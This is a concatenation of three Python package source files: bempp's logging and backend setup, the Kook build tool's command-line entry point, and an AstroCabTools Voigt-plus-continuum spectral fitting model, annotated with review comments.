# Suppress SciPy's "splu requires CSC matrix format" warning.
warnings.filterwarnings("ignore", message="splu requires CSC matrix format")

## Try importing OpenCL routines
# These helpers are optional; failures are swallowed so importing bempp.api
# still succeeds (the backend selection further below falls back to Numba).
try:
    from bempp.core.opencl_kernels import set_default_cpu_device
    from bempp.core.opencl_kernels import set_default_cpu_device_by_name
    from bempp.core.opencl_kernels import set_default_gpu_device_by_name
    from bempp.core.opencl_kernels import set_default_gpu_device
except:
    pass

# Console StreamHandler, set once enable_console_logging() has run.
CONSOLE_LOGGING_HANDLER = None
DEFAULT_LOGGING_FORMAT = "%(name)s:%(levelname)s: %(message)s"

# Log level aliases; TIMING (11) is a custom level between DEBUG and INFO.
DEBUG = _logging.DEBUG
TIMING = 11
INFO = _logging.INFO
WARNING = _logging.WARNING
ERROR = _logging.ERROR
CRITICAL = _logging.CRITICAL

# Map user-facing level names to numeric logging levels.
LOG_LEVEL = {
    "debug": DEBUG,
    "timing": TIMING,
    "info": INFO,
    "warning": WARNING,
    "error": ERROR,
    "critical": CRITICAL,
}

# Global parameter store shared across bempp.api.
GLOBAL_PARAMETERS = DefaultParameters()
def _init_logger():
    """Create and return the 'bempp' logger with the custom TIMING level
    registered and a NullHandler attached."""
    _logging.addLevelName(11, "TIMING")
    bempp_logger = _logging.getLogger("bempp")
    bempp_logger.addHandler(_logging.NullHandler())
    bempp_logger.setLevel(DEBUG)
    return bempp_logger
def log(message, level="info", flush=True):
    """Send *message* to the bempp logger at the named *level*, flushing
    handlers by default (required for timely output in Jupyter)."""
    severity = LOG_LEVEL[level]
    LOGGER.log(severity, message)
    if flush:
        flush_log()
def flush_log():
    """Flush every handler attached to the bempp logger (needed in Jupyter)."""
    for log_handler in LOGGER.handlers:
        log_handler.flush()
def enable_console_logging(level="info"):
    """Attach (once) a console StreamHandler at the named *level* and return it.

    Worker processes in a device pool get their pool ID in the log format so
    messages can be attributed to the emitting process."""
    from bempp.api.utils import pool

    # pylint: disable=W0603
    global CONSOLE_LOGGING_HANDLER
    # Already enabled: hand back the existing handler unchanged.
    if CONSOLE_LOGGING_HANDLER:
        return CONSOLE_LOGGING_HANDLER

    handler = _logging.StreamHandler()
    handler.setLevel(LOG_LEVEL[level])
    if pool.is_worker():
        formatter = _logging.Formatter(
            f"%(name)s:PROC{pool._MY_ID}:%(levelname)s: %(message)s", "%H:%M:%S"
        )
    else:
        formatter = _logging.Formatter(
            "%(name)s:HOST:%(levelname)s: %(message)s", "%H:%M:%S"
        )
    handler.setFormatter(formatter)
    LOGGER.addHandler(handler)
    CONSOLE_LOGGING_HANDLER = handler
    return CONSOLE_LOGGING_HANDLER
# def enable_file_logging(file_name, level=DEBUG, logging_format=DEFAULT_LOGGING_FORMAT):
# """Enable logging to a specific file."""
# file_handler = _logging.FileHandler(file_name)
# file_handler.setLevel(level)
# file_handler.setFormatter(_logging.Formatter(logging_format, "%H:%M:%S"))
# LOGGER.addHandler(file_handler)
# return file_handler
def set_logging_level(level):
    """Change the bempp logger's threshold to the named *level*."""
    target = LOG_LEVEL[level]
    LOGGER.setLevel(target)
# pylint: disable=too-few-public-methods
class Timer:
    """Context manager that measures the wall-clock time of a code region.

    On entry/exit it optionally emits log records (at *level*) tagged with
    *message*; the elapsed seconds are stored in the ``interval`` attribute.
    """

    def __init__(self, enable_log=True, message="", level="timing"):
        """Store the logging options and reset the timing attributes."""
        self.start = 0
        self.end = 0
        self.interval = 0
        self.enable_log = enable_log
        self.level = level
        self.message = message

    def __enter__(self):
        """Record the start time, announcing the operation when logging is on."""
        if self.enable_log:
            log(f"Start operation: {self.message}", level=self.level)
        self.start = _time.time()
        return self

    def __exit__(self, *args):
        """Record the end time, compute ``interval`` and log the result."""
        self.end = _time.time()
        self.interval = self.end - self.start
        if self.enable_log:
            log(f"Finished Operation: {self.message}: {self.interval}s",
                level=self.level)
# Module-wide logger instance, created once at import.
LOGGER = _init_logger()

# Absolute path of the installed bempp package directory.
BEMPP_PATH = _os.path.abspath(
    _os.path.join(_os.path.dirname(_os.path.realpath(__file__)), "..")
)

# pylint: disable=W0702
# try:
#     if _os.environ['BEMPP_CONSOLE_LOGGING'] == '1':
#         enable_console_logging()
# except:
#     pass

# Scratch directory for temporary files.
# NOTE(review): never removed on exit -- confirm cleanup is handled elsewhere.
TMP_PATH = _tempfile.mkdtemp()
# Get the path to Gmsh
def _gmsh_path():
    """Locate the Gmsh executable; return its path or None when not found."""
    from bempp.api.utils import which

    if _os.name == "nt":
        # On Windows try the explicit .exe name first, then the bare name.
        executable = which("gmsh.exe")
        if executable is None:
            executable = which("gmsh")
    else:
        executable = which("gmsh")
    if executable is None:
        print(
            "Could not find Gmsh."
            "Interactive plotting and shapes module not available."
        )
    return executable
def check_for_fmm():
    """Return True if a compatible FMM backend (ExaFMM) is importable.

    Replaces the original bare ``except:`` (which silently swallowed every
    exception type) with a targeted ``ImportError`` handler and drops the
    redundant flag juggling.
    """
    try:
        import exafmm  # noqa: F401  -- availability probe only
    except ImportError:
        return False
    return True
def _get_version():
    """Return the bempp version string declared in bempp.version."""
    from bempp import version as _version

    return _version.__version__
# Resolve external tools and finish module-level configuration.
GMSH_PATH = _gmsh_path()
__version__ = _get_version()

# Default plotting backend; switched to the notebook backend when running
# inside Jupyter (detected through the interactive shell class name).
PLOT_BACKEND = "gmsh"
try:
    ipy = get_ipython()
    if ipy.__class__.__name__ == "ZMQInteractiveShell":
        # We are in a jupyter notebook, so change plotting backend
        PLOT_BACKEND = "jupyter_notebook"
except NameError:
    # get_ipython is undefined outside IPython -> keep the gmsh backend.
    pass

USE_JIT = True
CPU_OPENCL_DRIVER_FOUND = False
GPU_OPENCL_DRIVER_FOUND = False

# Pick the compute backend: macOS uses Numba directly; elsewhere probe for
# OpenCL drivers and fall back to Numba when no CPU driver is usable.
if _platform.system() == "Darwin":
    DEFAULT_DEVICE_INTERFACE = "numba"
else:
    # NOTE(review): the bare excepts below hide *any* failure while probing
    # for drivers -- consider narrowing them (e.g. ImportError/OSError).
    try:
        from bempp.core.opencl_kernels import find_cpu_driver

        CPU_OPENCL_DRIVER_FOUND = find_cpu_driver()
    except:
        pass
    try:
        from bempp.core.opencl_kernels import find_gpu_driver

        GPU_OPENCL_DRIVER_FOUND = find_gpu_driver()
    except:
        pass
    if CPU_OPENCL_DRIVER_FOUND:
        DEFAULT_DEVICE_INTERFACE = "opencl"
    else:
        DEFAULT_DEVICE_INTERFACE = "numba"

if DEFAULT_DEVICE_INTERFACE == "numba":
    log(
        "Numba backend activated. For full performance the OpenCL backend with an OpenCL CPU driver is required."
    )

# Module-level defaults (presumably read by the assembly code -- confirm).
DEFAULT_PRECISION = "double"
VECTORIZATION_MODE = "auto"
BOUNDARY_OPERATOR_DEVICE_TYPE = "cpu"
POTENTIAL_OPERATOR_DEVICE_TYPE = "cpu"
ALL = -1  # Useful global identifier
/Kook-0.7.2.tar.gz/Kook-0.7.2/lib/kook/main.py |
###
### $Release: 0.7.2 $
### $Copyright: copyright(c) 2008-2012 kuwata-lab.com all rights reserved. $
### $License: MIT License $
###
# Public API of this module.
__all__ = ('MainObject', 'MainCommand', 'MainApplication')
import sys, os, re
import kook
from kook import KookCommandError, KookRecipeError, __RELEASE__
from kook.cookbook import Cookbook
from kook.kitchen import Kitchen
import kook.config as config
from kook.utils import CommandOptionParser, CommandOptionError, read_file, str2int
class MainObject(object):
    """Common base class for Kook entry points.

    Stores the invoked command name and its arguments, and provides the
    property-file loading shared by MainCommand and MainApplication.
    """

    def __init__(self, argv=None):
        # argv defaults to sys.argv; argv[0] becomes the displayed command name.
        if argv is None: argv = sys.argv
        self.command = os.path.basename(argv[0])
        self.args = argv[1:]
    def invoke(self):
        """Run the entry point; subclasses must override."""
        raise NotImplementedError("%s#invoke(): not implemented yet." % self.__class__.__name__)
    def main(self):
        """Top-level driver (invoke + error reporting); subclasses must override."""
        raise NotImplementedError("%s#main(): not implemented yet." % self.__class__.__name__)
    def _load_property_file(self, filename=None):
        """Load user properties from a Python file.

        Defaults to ``config.properties_filename``.  Returns a dict keeping
        only names that start with an ASCII letter (dunders etc. stripped).
        """
        if filename is None:
            filename = config.properties_filename
        props = {}
        if os.path.isfile(filename):
            content = read_file(filename)
            #exec content in props, props
            # SECURITY NOTE(review): the property file is executed as
            # arbitrary Python code; only trusted files should be loaded.
            exec(content, props, props)
            for name in list(props.keys()):
                if not re.match(r'^[a-zA-Z]', name):
                    del props[name]
        return props
# One-line hints appended to recipe listings; MainCommand.get_tip() picks
# one pseudo-randomly.
TIPS = [
    "you can set 'kookbook.default=\"XXX\"' in your kookbook.",
    "you can override properties with '--propname=propvalue'.",
    "it is able to separate properties into 'Properties.py' file.",
    # FIX: typo "shortcat" -> "shortcut" in the displayed tip.
    "try 'kk' command which is shortcut for 'pykook' command.",
    "'@ingreds(\"$(1).c\", if_exists(\"$(1).h\"))' is a friend of C programmer.",
    "'c%\"gcc $(ingred)\"' is more natural than '\"gcc %s\" % c.ingreds[0]'.",
]
class MainCommand(MainObject):
    """Entry point for the ``pykook``/``kk`` command-line tool.

    Parses command-line options, loads the cookbook and user properties,
    then either lists recipes or cooks the requested products.
    """

    # Option definitions consumed by CommandOptionParser.
    optdef_strs = (
        "-h: help",
        #"--help: help",
        "-V: version",
        "-D[N]: debug level (default: 1)",
        "-q: quiet",
        "-f file: kookbook",
        "-F: run forcedly (ignore timestamps)",
        "-n: not execute (dry run)",
        "-l: list public recipes",
        "-L: list all recipes",
        "-R: search parent directory recursively for Kookbook",
        "--name=value: property name and value",
        "--name: property name and value(=True)",
    )
    def invoke(self):
        """Parse options, load the cookbook, and run the requested targets.

        Returns a process exit status: 0 on success, 1 when no target is
        given and the cookbook declares no default product.  Raises
        CommandOptionError for bad options or a missing cookbook.
        """
        ## parse command-line options
        optparser = CommandOptionParser(self.optdef_strs)
        opts, longopts, rests = optparser.parse2(self.args, command=self.command)
        #print "*** debug: command option: opts=%s, longopts=%s, rests=%s" % (repr(opts), repr(longopts), repr(rests))
        ## handle options
        if opts.get('h') or longopts.get('help') is True:
            sys.stdout.write("%s - build tool like Make, Rake, Ant, or Cook\n" % self.command)
            sys.stdout.write(optparser.help())
            return 0
        if opts.get('V'):
            sys.stdout.write(__RELEASE__ + "\n")
            return 0
        if opts.get('q'): config.quiet = True
        if opts.get('F'): config.forced = True
        if opts.get('n'): config.noexec = True
        if opts.get('D'):
            v = str2int(opts['D']) # notice that int(True) is 1
            if v is None:
                raise CommandOptionError('-D%s: integer is required.' % opts['D'])
            config.debug_level = v
        ## find cookbook
        bookname = opts.get('f', config.cookbook_filename)
        bookpath = bookname
        if opts.get('R'):
            # -R: walk up parent directories until a cookbook is found or
            # the filesystem root is reached (abspath stops changing).
            abspath = os.path.abspath
            while not os.path.exists(bookpath):
                parent = os.path.join("..", bookpath)
                if abspath(parent) == abspath(bookpath): break
                bookpath = parent
        # Old-style conditional: '-f ' prefix only for user-supplied names.
        s = opts.get('f') and '-f ' or ''
        if not os.path.exists(bookpath):
            raise CommandOptionError('%s%s: not found.' % (s, bookname))
        if not os.path.isfile(bookpath):
            raise CommandOptionError('%s%s: not a file.' % (s, bookname))
        ## change directory if cookbook is in parent directory
        if bookname != bookpath:
            path = bookpath[:-len(bookname)]
            os.chdir(path)
        ## property file
        props = self._load_property_file()
        if longopts:
            props.update(longopts)
        ## create cookbook
        # kook._BOOK_CONTENT (if set) holds an in-memory cookbook used by
        # tests/embedding; otherwise the cookbook file is loaded from disk.
        if getattr(kook, '_BOOK_CONTENT', None):
            cookbook = Cookbook(props).load(kook._BOOK_CONTENT)
        else:
            cookbook = Cookbook.new(bookname, props)
        ## list recipes
        if opts.get('l') or opts.get('L'):
            self._list_recipes(cookbook, opts)
            return 0
        ## get default product if no argument
        if not rests:
            default_product = cookbook.default_product()
            if not default_product:
                write = sys.stderr.write
                write("*** %s: target is not given\n" % self.command)
                write("*** '%s -l' or '%s -L' shows recipes and properties.\n" % (self.command, self.command))
                write("*** (or set 'kookbook.default=\"XXX\"' in your kookbook.)\n")
                return 1
            rests = [default_product]
        ## start cooking
        kitchen = Kitchen.new(cookbook)
        kitchen.start_cooking(*rests)
        ##
        return 0
    def _list_recipes(self, cookbook, opts):
        """Print properties, task/file recipes, default product and a tip.

        With -L all recipes are shown; with -l only documented ones.
        """
        show_all = opts.get('L')
        # NOTE(review): `format` shadows the builtin of the same name
        # (harmless within this method).
        format = " %-20s: %s\n"
        #format2 = " %-18s: %s\n"
        format2 = " %-20s %s\n"
        write = sys.stdout.write
        ## properties
        write("Properties:\n")
        for prop_name, prop_value in cookbook.all_properties():
            write(format % (prop_name, repr(prop_value)))
        write("\n")
        ## task and file recipes
        def f(title, recipes):
            # Local helper: prints one titled section of recipes, with
            # per-recipe option help unless quiet mode is on.
            write(title + ":\n")
            for recipe in recipes:
                if show_all or recipe.desc:
                    prod_str = recipe.product
                    if recipe.spices:
                        optparser = CommandOptionParser(recipe.spices)
                        if optparser.arg_desc:
                            prod_str += ' ' + optparser.arg_desc
                    write(format % (prod_str, recipe.desc or ''))
                    if config.quiet:
                        continue
                    if recipe.spices:
                        for opt, desc in optparser.helps:
                            if desc:
                                write(format2 % (opt, desc))
            write("\n")
        f("Task recipes", cookbook.specific_task_recipes + cookbook.generic_task_recipes)
        f("File recipes", cookbook.specific_file_recipes + cookbook.generic_file_recipes)
        ## default product
        default_product = cookbook.default_product()
        if default_product:
            write("kookbook.default: %s\n" % default_product)
            write("\n")
        ## tips
        if not opts.get('q'):
            tip = self.get_tip(default_product)
            write("(Tips: %s)\n" % tip)
        return 0
    def get_tip(self, default_product):
        """Pick a tip from TIPS, biasing index 0 (the kookbook.default tip)
        towards cookbooks that have no default product set."""
        from random import random
        index = int(random() * len(TIPS))
        assert index < len(TIPS)
        if default_product: # if default product is specified,
            if index == 0: # escape tip about it.
                index = int(random() * len(TIPS)) or 1
        else: # if default product is not specified,
            if random() < 0.5: # show tip about it frequently.
                index = 0
        return TIPS[index]
    def main(self):
        """Run invoke(), report Kook errors on stderr, return exit status.

        Unknown exceptions (or any exception while debug_level > 0) are
        re-raised for a full traceback.
        """
        try:
            status = self.invoke()
            return status
        except Exception:
            ex = sys.exc_info()[1]
            ## show command option error
            ex_classes = (CommandOptionError, KookCommandError, KookRecipeError) # or (CommandOptionError, KookError)
            if isinstance(ex, ex_classes):
                if not isinstance(ex, CommandOptionError):
                    sys.stderr.write("*** ERROR\n")
                sys.stderr.write(self.command + ": " + str(ex) + "\n")
            ## system() failed
            if isinstance(ex, KookCommandError):
                #sys.stderr.write(self.command + ": " + str(ex) + "\n")
                # Try to point at the failing line *inside the cookbook*;
                # fall back to a plain traceback when it isn't found.
                traceback_obj = sys.exc_info()[2]
                import traceback
                found = False
                bookname = config.cookbook_filename
                for tupl in reversed(traceback.extract_tb(traceback_obj)):
                    filename, linenum, func_name, message = tupl
                    if filename.endswith(bookname):
                        found = True
                        break
                if found:
                    sys.stderr.write("%s:%s: %s\n" % (filename, linenum, message))
                else:
                    traceback.print_tb(traceback_obj, file=sys.stderr)
            ## kick emacsclient when $E defined
            if os.environ.get('E'):
                # Developer convenience: jump an editor to the deepest
                # writable file mentioned in the traceback.
                import traceback
                s = traceback.format_exc()
                pat = re.compile(r'^ File "(.*)", line (\d+),', re.M)
                tuples = [ (m.group(1), m.group(2)) for m in pat.finditer(s) ]
                tuples.reverse()
                for filename, linenum in tuples:
                    if os.access(filename, os.W_OK):
                        break
                else:
                    filename = linenum = None
                if filename and linenum:
                    kicker_command = "emacsclient -n +%s %s" % (linenum, filename)
                    os.system(kicker_command)
            ## re-raise exception when debug mode
            if not isinstance(ex, ex_classes) or config.debug_level > 0:
                raise
            status = 1
        return status
class MainApplication(MainObject):
    """Entry point for cookbooks run as standalone applications (via -X).

    Unlike MainCommand, the cookbook file is given with ``-X file`` and its
    task recipes are presented as sub-commands of the application.
    """

    def __init__(self, argv=None):
        # The command name is resolved later from the -X argument.
        if argv is None: argv = sys.argv
        #shebang_p = len(argv) >= 3 and argv[1] == '-X'
        #self.command = shebang_p and os.path.basename(argv[2]) or None
        self.command = None
        self.args = argv[1:]
    # Option definitions consumed by CommandOptionParser (disabled options
    # kept as comments to mirror MainCommand).
    optdef_strs = (
        "-h: help",
        #"--help: help",
        #"-V: version",
        "-D[N]: debug level (default: 1)",
        #"-q: quiet",
        #"-f file: kookbook",
        "-F: forcedly",
        #"-l: list public recipes",
        #"-L: list all recipes",
        #"-n: not invoke (dry run)",
        "-X file:",
        "--name=value: property name and value",
        "--name: property name and value(=True)",
    )
    def invoke(self):
        """Run _invoke() with quiet mode forced on; return its exit status."""
        quiet = config.quiet
        config.quiet = True
        try:
            # FIX: the status from _invoke() was computed but dropped, so
            # main() always returned None instead of an exit code.
            return self._invoke()
        finally:
            config.quiet = quiet
    def _invoke(self):
        """Parse options, load the cookbook named by -X, and run sub-commands.

        Returns 0 on success; raises CommandOptionError for bad usage.
        """
        ## parse command-line options
        optparser = CommandOptionParser(self.optdef_strs)
        opts, longopts, rests = optparser.parse2(self.args, command=self.command)
        #print "*** debug: command option: opts=%s, longopts=%s, rests=%s" % (repr(opts), repr(longopts), repr(rests))
        ## handle options
        bookname = opts.get('X')
        if not bookname:
            raise CommandOptionError("-X: script filename required.")
        self.command = os.path.basename(bookname)
        ## property file
        props = self._load_property_file()
        if longopts:
            props.update(longopts)
        ## help
        if opts.get('h') or longopts.get('help') is True:
            target = rests and rests[0] or None
            self._show_help(bookname, props, target=target, optparser=optparser)
            return 0
        ## other options
        #if opts.get('V'):
        #    sys.stdout.write(__RELEASE__ + "\n")
        #    return 0
        #if opts.get('q'): config.quiet = True
        if opts.get('F'): config.forced = True
        if opts.get('D'):
            v = str2int(opts['D']) # notice that int(True) is 1
            if v is None:
                raise CommandOptionError('-D%s: integer is required.' % opts['D'])
            config.debug_level = v
        ## create cookbook
        cookbook = Cookbook.new(bookname, props)
        if not rests:
            default_product = cookbook.default_product()
            if not default_product:
                raise CommandOptionError("sub-command is required (try '-h' to show all sub-commands).")
            rests = [default_product]
        ## start cooking
        kitchen = Kitchen.new(cookbook)
        kitchen.start_cooking(*rests)
        ##
        return 0
    def _show_help(self, bookname, props=None, target=None, optparser=None):
        """Show help for one sub-command (target given) or for all of them.

        FIX: ``props`` previously defaulted to a mutable ``{}``.
        """
        if props is None:
            props = {}
        cookbook = Cookbook.new(bookname, props)
        if target:
            self._show_help_for(cookbook, target)
        else:
            self._show_help_all(cookbook, optparser)
    def _show_help_for(self, cookbook, target):
        """Print the description and options of a single sub-command."""
        recipes = cookbook.specific_task_recipes
        write = sys.stdout.write
        lst = [ recipe for recipe in recipes if recipe.product == target ]
        if not lst:
            raise CommandOptionError("%s: sub command not found." % target)
        recipe = lst[0]
        write("%s %s - %s\n" % (self.command, recipe.product, recipe.desc or ''))
        if recipe.spices:
            optparser = CommandOptionParser(recipe.spices)
            for opt, desc in optparser.helps:
                write(" %-20s : %s\n" % (opt, desc))
    def _show_help_all(self, cookbook, optparser):
        """Print the application banner and the list of documented sub-commands."""
        recipes = cookbook.specific_task_recipes
        write = sys.stdout.write
        desc = cookbook.context.get('kook_desc') or ''
        write("%s - %s\n" % (self.command, desc))
        if False:
            # Intentionally disabled: global-options section (kept for
            # possible re-enabling; optparser is still passed in for it).
            write("\n")
            write("global-options:\n")
            write(optparser.help())
        write("\n")
        write("sub-commands:\n")
        for recipe in recipes:
            if recipe.desc:
                write(" %-15s : %s\n" % (recipe.product, recipe.desc))
        write("\n")
        write("(Type '%s -h subcommand' to show options of sub-commands.)\n" % self.command)
    def main(self):
        """Run invoke(); report CommandOptionError on stderr; return exit status."""
        try:
            status = self.invoke()
        except CommandOptionError:
            ex = sys.exc_info()[1]
            if self.command:
                sys.stderr.write(self.command + ": " + str(ex) + "\n")
            else:
                sys.stderr.write(str(ex) + "\n")
            status = 1
        return status
/AstroCabTools-1.5.1.tar.gz/AstroCabTools-1.5.1/astrocabtools/fit_line/src/models/voigtModelCreation.py | import numpy as np
import pandas as pd
from lmfit import Parameters, Model
import sys
import traceback
import io
from collections import deque
from .voigtPointsData import voigtPointsData
from .linePointsData import linePointsData
from .quadraticPointsData import quadraticPointsData
from .exponentialPointsData import exponentialPointsData
from .powerLawPointsData import powerLawPointsData
from astrocabtools.fit_line.src.utils.fitting_model_creation import calculate_intercept, calculate_slope, integrated_flux, voigt_fitting_function, line_fitting_function, quadratic_fitting_function, exponential_fitting_function, powerLaw_fitting_function
# Public API of this module.
__all__ = ['voigtModel']
class voigtModel:
    """Interactive Voigt-profile + continuum model builder.

    Guide points selected by the user are queued, converted into initial
    parameter guesses, and fed to an lmfit composite model (Voigt line
    plus a continuum of type 'line', 'quadratic', 'exponential' or
    'powerLaw') that is fitted to a slice of the spectrum.
    """

    def __init__(self, textLines, typeCont, parent=None):
        """Create empty point containers for the chosen continuum type.

        :param textLines: iterable of helper texts consumed one per
            selected point (armed as an iterator by init_data_points).
        :param str typeCont: continuum type ('line', 'quadratic',
            'exponential' or 'powerLaw').
        :param parent: unused; kept for signature compatibility.
        """
        super().__init__()
        if typeCont == 'line':
            self.__continuumFitPoints = linePointsData(leftX=0.0, rightX=0.0, leftY=0.0, rightY=0.0)
        elif typeCont == 'quadratic':
            self.__continuumFitPoints = quadraticPointsData(leftX=0.0, rightX=0.0, leftY=0.0, rightY=0.0, c2=0.0)
        elif typeCont == 'exponential':
            self.__continuumFitPoints = exponentialPointsData(leftX=0.0, rightX=0.0, leftY=0.0, rightY=0.0)
        elif typeCont == 'powerLaw':
            self.__continuumFitPoints = powerLawPointsData(leftX=0.0, rightX=0.0, leftY=0.0, rightY=0.0)
        self.__voigtFitPoints = voigtPointsData(leftX=0.0,rightX=0.0,topX=0.0,sigma1X=0.0,sigma2X=0.0, leftY=0.0,rightY=0.0,topY=0.0,sigma1Y=0.0,sigma2Y=0.0, gamma=0.0)
        self.__voigtDict = {}
        self.__voigtDeque = deque()
        self.__lines = []
        self.__markers = []
        self.__textLines = textLines
        self.__typeCont = typeCont

    @property
    def lines(self):
        """Line artists drawn for this model."""
        return self.__lines

    @property
    def markers(self):
        """Marker artists drawn for the selected guide points."""
        return self.__markers

    @lines.setter
    def lines(self, figure):
        # NOTE: the setter *appends* rather than replaces.
        self.__lines.append(figure)

    @markers.setter
    def markers(self, marker):
        # NOTE: the setter *appends* rather than replaces.
        self.__markers.append(marker)

    def del_marker(self, marker):
        """Remove a previously registered marker artist."""
        self.__markers.remove(marker)

    def del_line(self, line):
        """Remove a previously registered line artist."""
        self.__lines.remove(line)

    def init_data_points(self):
        """Merge continuum and Voigt point dicts and arm the guide texts."""
        continuumFitDict = self.__continuumFitPoints.asdict()
        voigtFitDict = self.__voigtFitPoints.asdict()
        # Merge the two dicts to simplify the iterative filling process
        # (dict.update returns None, so `or` yields the merged voigtFitDict).
        self.__voigtDict = voigtFitDict.update(continuumFitDict) or voigtFitDict
        self.__textLines = iter(self.__textLines)

    def add_data_points(self, xdata, ydata):
        """Queue one user-selected coordinate pair.

        :param float xdata: X coordinate
        :param float ydata: Y coordinate
        :returns: the guide-text iterator so the caller can advance it.
        """
        self.__voigtDeque.append((xdata, ydata))
        return self.__textLines

    def _generate_initial_voigt_model(self, wavelengthValues, A, c, sigma, gamma):
        """Evaluate the initial (pre-fit) Voigt guess on the wavelength grid."""
        y_values = []
        for x in wavelengthValues:
            y_values.append(voigt_fitting_function(x, A, c, sigma, gamma))
        return y_values

    def draw_model_fit(self, path, wavelength, flux):
        """Build the Voigt+continuum model, fit it, and format the results.

        :param str path: spectrum file path (echoed into the result text).
        :param wavelength: 1-d array of wavelengths.
        :param flux: 1-d array of fluxes aligned with ``wavelength``.
        :returns: (lmfit result, result text, wavelengths, fluxes,
            initial model y-values, None).
        """
        if self.__typeCont == 'quadratic':
            # Quadratic continuum needs two extra seed values in the queue.
            self.__voigtDeque.append(1)
            self.__voigtDeque.append(1.)
        # Fill the merged parameter dict from the queued points, in order.
        for i, key in enumerate(self.__voigtDict.keys()):
            self.__voigtDict[key] = self.__voigtDeque[i]
        # Obtain the wavelength values on the selected range.
        wavelengthValues = wavelength[(wavelength >= self.__voigtDict['left'][0]) & (wavelength <= self.__voigtDict['right'][0])]
        # Obtain the indexes from the initial wavelength array based on the
        # min and max values of the slice made previously.
        index1 = np.where(wavelength == np.amin(wavelengthValues))
        index2 = np.where(wavelength == np.amax(wavelengthValues))
        # Obtain the flux values between the indexes obtained previously.
        fluxValues = flux[index1[0][0]:(index2[0][0]+1)]
        voigt = Model(voigt_fitting_function, name= 'model1')
        # Initial guesses: center at the 'top' point; 3.6013 is presumably
        # a Voigt FWHM-to-sigma conversion factor -- TODO confirm.
        c = self.__voigtDict['top'][0]
        sigma=abs(self.__voigtDict['sigma2'][1]-self.__voigtDict['sigma1'][1])/3.6013
        A = (self.__voigtDict['top'][1] - (self.__voigtDict['left'][1] + self.__voigtDict['right'][1])/2.) *3.6013* sigma
        gamma = sigma
        initial_y_values = self._generate_initial_voigt_model(wavelengthValues, A, c, sigma, gamma)
        if self.__typeCont == 'line':
            b = calculate_slope(self.__voigtDict['left'][0], self.__voigtDict['left'][1],self.__voigtDict['right'][0], self.__voigtDict['right'][1])
            a=calculate_intercept(b, self.__voigtDict['left'][0], self.__voigtDict['left'][1])
            line = Model(line_fitting_function, name='continuum_fitting_function')
            voigt_model = voigt + line
            params = voigt_model.make_params(A = A,
                                             c = c,
                                             sigma= sigma,
                                             gamma = gamma,
                                             a= a,
                                             b= b)
            init = voigt_model.eval(params, x=wavelengthValues)
            result = voigt_model.fit(fluxValues, params, x=wavelengthValues, nan_policy='omit')
            # Update table of results parameters.
            resultText = "Path: {}".format(path)
            resultText = resultText + "\n" + \
                "z: (x - {} + i*{})/(sigma * sqrt(2)".format(str(result.params['c'].value), str(result.params['gamma'].value))
            resultText = resultText + "\n" + \
                "Voigt model: ({} * Re[e**(-z**2)*erfc(-i*z)])/({} * sqrt(2*pi))".format(str(result.params['A'].value), str(result.params['sigma'].value))
            resultText = resultText + "\n" + "Line model: {} + {} * x".format(str(result.params['a'].value), str(result.params['b'].value))
            resultText = resultText + "\n" + "Voigt integrated flux : "+ " = " + str(integrated_flux(result.params['A'].value, result.params['sigma'].value, 'voigt'))
            voigtFitResultList = [key + " = " + str(result.params[key].value) for key in result.params]
            for resultParams in voigtFitResultList:
                resultText = resultText + "\n" + resultParams
            resultText = resultText + "\n" + "Chi-square" + " = " + str(result.chisqr)
            return result, resultText, wavelengthValues, fluxValues, initial_y_values, None
        elif self.__typeCont == 'quadratic':
            b = calculate_slope(self.__voigtDict['left'][0], self.__voigtDict['left'][1],self.__voigtDict['right'][0], self.__voigtDict['right'][1])
            a=calculate_intercept(b, self.__voigtDict['left'][0], self.__voigtDict['left'][1])
            c2 = 1.
            quadratic = Model(quadratic_fitting_function, name= 'continuum_fitting_function')
            voigt_model = voigt + quadratic
            params = voigt_model.make_params(A = A,
                                             c = c,
                                             sigma=sigma,
                                             gamma = gamma,
                                             a=a,
                                             b=b,
                                             c2= c2)
            init = voigt_model.eval(params, x=wavelengthValues)
            result = voigt_model.fit(fluxValues, params, x=wavelengthValues)
            # Update table of results parameters.
            resultText = "Path: {}".format(path)
            resultText = resultText + "\n" + \
                "z: (x - {} + i*{})/(sigma * sqrt(2)".format(str(result.params['c'].value), str(result.params['gamma'].value))
            resultText = resultText + "\n" + \
                "Voigt model: ({} * Re[e**(-z**2)*erfc(-i*z)])/({} * sqrt(2*pi))".format(str(result.params['A'].value), str(result.params['sigma'].value))
            resultText = resultText + "\n" + "Quadratic model: {} + {} * x + {}*x**2".format(str(result.params['a'].value), str(result.params['b'].value), str(result.params['c2'].value))
            resultText = resultText + "\n" + "Voigt integrated flux : "+ " = " + str(integrated_flux(result.params['A'].value, result.params['sigma'].value, 'voigt'))
            voigtFitResultList = [key + " = " + str(result.params[key].value) for key in result.params]
            for resultParams in voigtFitResultList:
                resultText = resultText + "\n" + resultParams
            resultText = resultText + "\n" + "Chi-square" + " = " + str(result.chisqr)
            return result, resultText, wavelengthValues, fluxValues, initial_y_values, None
        elif self.__typeCont == 'exponential':
            tau = (self.__voigtDict['right'][0] - self.__voigtDict['left'][0])/np.log(self.__voigtDict['left'][1]/self.__voigtDict['right'][1])
            # FIX: was ``math.e`` but ``math`` is never imported in this
            # module (NameError at runtime); use the NumPy constant.
            A_exp = self.__voigtDict['left'][1]/np.e**(-self.__voigtDict['left'][0]/tau)
            exponential = Model(exponential_fitting_function, name= 'continuum_fitting_function')
            voigt_model = voigt + exponential
            params = voigt_model.make_params(A = A,
                                             c = c,
                                             sigma=sigma,
                                             gamma=gamma,
                                             A_exp = A_exp,
                                             tau=tau)
            init = voigt_model.eval(params, x=wavelengthValues)
            result = voigt_model.fit(fluxValues, params, x=wavelengthValues)
            # Update table of results parameters.
            resultText = "Path: {}".format(path)
            resultText = resultText + "\n" + \
                "z: (x - {} + i*{})/(sigma * sqrt(2)".format(str(result.params['c'].value), str(result.params['gamma'].value))
            resultText = resultText + "\n" + \
                "Voigt model: ({} * Re[e**(-z**2)*erfc(-i*z)])/({} * sqrt(2*pi))".format(str(result.params['A'].value), str(result.params['sigma'].value))
            resultText = resultText + "\n" + "Exponential model: {} * e**(-x /{})".format(str(result.params['A_exp'].value), str(result.params['tau'].value))
            resultText = resultText + "\n" + "Voigt integrated flux : "+ " = " + str(integrated_flux(result.params['A'].value, result.params['sigma'].value, 'voigt'))
            voigtFitResultList = [key + " = " + str(result.params[key].value) for key in result.params]
            for resultParams in voigtFitResultList:
                resultText = resultText + "\n" + resultParams
            resultText = resultText + "\n" + "Chi-square" + " = " + str(result.chisqr)
            return result, resultText, wavelengthValues, fluxValues, initial_y_values, None
